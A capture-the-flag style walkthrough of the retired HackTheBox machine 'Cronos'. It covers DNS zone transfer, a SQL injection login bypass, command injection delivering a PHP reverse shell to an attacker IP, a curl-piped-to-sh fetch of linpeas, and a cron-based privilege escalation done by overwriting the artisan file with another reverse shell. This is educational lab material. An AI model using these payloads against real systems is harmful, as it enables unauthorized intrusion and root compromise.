Cronos - Description
|Release:||22 Mar 2017|
Back with another retired machine on HackTheBox, this time we have
Cronos, which if you break then it becomes
From the name, I assume this machine must have something to do with
Cron jobs, but it is an assumption.
As usual, we start with Nmap enumeration
nmap -sC -sV -A 10.10.10.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 20:20 EDT Nmap scan report for cronos.htb (10.10.10.13) Host is up (0.38s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA) | 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA) |_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519) 53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Cronos Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 46.64 seconds
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
22/tcp SSH can help us with username enumeration
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
53/tcp Domain BIND v9 has known vulnerabilities
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Apache server running at port 80
Starting with port 80,
- Navigate to
- Apache2 Ubuntu default page loads
- Apart from Apache default page nothing else is found.
- Its time to use our arsenals, that is
disbusterto enumerate directories.
- Used Dirbuster and found nothing.
- This is what we call hitting a wall
It seems, IP
10.10.10.13 might have a virtual hostname, lets try to find it via
nslookup 10.10.10.13 10.10.10.13
In above command, we first set our nslookup server value
10.10.10.13 and then pass the IP we want to lookup
From result, it looks the IP resolves to
ns1.cronos.htb. We get our domain name
cronos.htb to work, we need to resolve IP 10.10.10.13 to
cronos.htb in our
To do so,
sudo nano /etc/hosts
and add below line
Now when we browse to
cronos.htb page, it will be resolved to 10.10.10.13 and will serve the page based on the virtual host configuration
When we browse to
cronos.htb, we get this page
It did not contain anything else than the white page as shown above, which means we again hit a wall.
After looking at the Nmap scan again and again, the second service
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux) kept bugging me. Port 53 why this service is used so I googled it.
Checking over google, gives following answer to question
what port 53 used for
The DNS uses TCP Port 53 for zone transfer, for maintaining coherence between the DNS database and the server. The UDP protocol is used when a client sends a query to the DNS server. The TCP protocol should not be used for queries as it gives a lot of information, which is useful to attackers
Also not to forget, if you navigate to
You will read that, BIND provides tools that help manage a DNS system, including:
- dig - allows users to run DNS queries and view server output.
- host - converts hostnames to IP addresses.
- nslookup - queries DNS servers for information about hosts and domains.
- Remote Name Daemon Control (rndc) - allows administrators to control all operations of the name server via an encrypted channel
Lets initiate a zone transfer and see what we get
dig axfr @10.10.10.13 cronos.htb
Well well well, it looks like we hit a right wall this time,
I know, you must be in hurry to browse to
admin.cronos.htb but wait, first add the subdomain in
Now lets browse to
Awesome, we have a login form, without wasting any time, lets test the login page for boolean based SQL injection
Enter value of UserName :
admin' or 'a'='a'-- a and password anything. Click submit
Yes, it is vulnerable to SQL injection and we are logged in
The form contains two services
Ping. Both are OS commands so we can get our reverse shell easily if user input is not properly santized.
Start a listener in your terminal
nc -nlvp 6001
Change the service from
Ping and enter value as
127.0.0.1; php -r '$sock=fsockopen("10.10.14.25",6001);exec("/bin/sh -i <&3 >&3 2>&3");'
Hence we got our shell
The current user is
Lets find our first flag to complete the ritual
cd /home && ls
User directory is
cd noulis && ls
& in order to read flag
/root is denied, so we need to escalate privileges.
sudo -l. It gives nothing.
When I dont find any service using
sudo -l, then next thing I do is use linpeas to enumerate everything possible on the box
If you are new to linpeas, follow below steps to use it.
On your base machine(In my case it is kali Linux), run below commands
git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
Now navigate to
cd privilege-escalation-awesome-scripts-suite && cd linPEAS
Now run python server to serve the
linpeas file to the
cronos machine or to machine whose reverse shell you just got
python -m SimpleHTTPServer 6002
Now in the cronos machine/Shell , Run
Note: Run below command in the reverse shell you just got
curl 10.10.14.25:6002/linpeas.sh | sh
Note : IP 10.10.14.25 is my
The scan results a lot of juicy information, but we are interested in something which can get us root
If you remember, In starting I mentioned the machine name to be
Cron+OS and it might have something to do with
cron jobs. I think I was right.
The result of linpeas contains
You can also read the crontab by
If you are new to
cron jobs and want to learn about it then follow this blog. It explain cron jobs very well
Also if you are new to
Laravel and wondering what is
artisan then follow this documentation
Artisan is the command-line interface included with Laravel. It provides a number of helpful commands that can assist you while you build your application
The artisan file is run by root as shown in above image, if user
www-data has write permission to
artisan file, then we can get root. Lets check it by navigating to the location
cd /var/www/laravel && ls -la
Yess, the user has write permissions
Lets edit the file by running the below command
echo '<?php $sock=fsockopen("10.10.14.25",6005);exec("/bin/sh -i <&3 >&3 2>&3"); ?>' > /var/www/laravel/artisan
The above command will change the commands written inside the
Now run a
netcat listener to check if we get root
nc -nlvp 6005
Wait for the cronjob to do its work and give us a shell
Hence the R00t is pwned
To complete the ritual, lets find our root.txt